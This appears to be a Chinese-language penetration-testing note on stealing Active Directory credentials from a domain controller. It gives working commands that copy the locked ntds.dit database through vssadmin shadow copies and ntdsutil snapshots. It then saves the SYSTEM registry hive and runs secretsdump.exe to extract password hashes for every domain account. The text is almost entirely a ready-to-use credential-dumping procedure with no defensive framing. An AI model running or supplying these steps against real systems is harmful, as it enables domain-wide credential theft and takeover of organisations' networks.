在活动⽬录中,所有的数据都保存在域控的ntds.dit⽂件中。 ntds.dit是⼀ 个⼆进制⽂件,⽂件路径为域控的%SystemRoot%\ntds\ntds.dit。NTDS.dit 包 含不限于⽤户名、散列值、组、GPP、OU等活动⽬录的信息。系统运维⼈员可以使⽤VSS实 现对该⽂件的导出和复制
说白了这玩意就是ad的数据库,但是这个东西又是加密的,需要system注册表才能解密。
VSS (Volume Shadow copy Service, 卷映射拷⻉服务)
在一般情况下,Ntds.dit是默认被Windows系统锁定的,想要读取该文件就要利用卷影拷贝服务(Volume Shadow Copy Service,VSS),得到Ntds.dit文件的副本。卷影拷贝服务(VSS)本质上是属于快照技术的一种,主要用于备份和恢复,即使目标文件被处于锁定状态。
vssadmin是Windows上的一个卷影拷贝服务的命令行管理工具,可用于创建和删除卷影拷贝、列出卷影拷贝的信息,显示已安装的所有卷影拷贝写入程序和提供程序,以及改变卷影拷贝的存储空间的大小等。
其适用于: Windows 10,Windows 8.1,Windows Server 2016,Windows Server 2012 R2,Windows Server 2012,Windows Server 2008 R2,Windows Server 2008
vssadmin create shadow /for=C:
#执行结果:
C:\Windows\system32>vssadmin create shadow /for=C:
vssadmin 1.1 - 卷影复制服务管理命令行工具
(C) 版权所有 2001-2005 Microsoft Corp.
成功地创建了 'C:\' 的卷影副本
卷影副本 ID: {e110f046-0d04-46a0-a8b3-b025b59a2674}
卷影副本卷名: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\ntds\ntds.dit C:\ntds.dit
vssadmin delete shadows /for=c: /quiet
#创建快照,完成后将会⽣成⼀个GUID
ntdsutil snapshot "activate instance ntds" create quit quit
#使⽤GUID挂载快照
ntdsutil snapshot "mount {6affcd44-c838-424c-885b-468464faa975}" quit quit
ntdsutil snapshot "mount {bb2a7e48-300c-4eae-9e29-98b7d926b42a}" quit quit
#挂载的⽂件⽂件复制到 c:\temp\ntds.dit
copy C:\$SNAP_202202182022_VOLUMEC$\windows\ntds\ntds.dit c:\temp\ntds.dit
#卸载快照并删除快照
ntdsutil snapshot "mount {bb2a7e48-300c-4eae-9e29-98b7d926b42a}" "delete {bb2a7e48-300c-4eae-9e29-98b7d926b42a}" quit quit
#查询当前系统中的所有快照
ntdsutil snapshot "List All" quit quit
reg save hklm\system c:\system
#保存system⽂件
现在我们已经拿到了NTDS.dit和system注册表
windows10魔改版的里面有一个工具secretsdump.exe
secretsdump.exe -ntds ntds.dit -system system LOCAL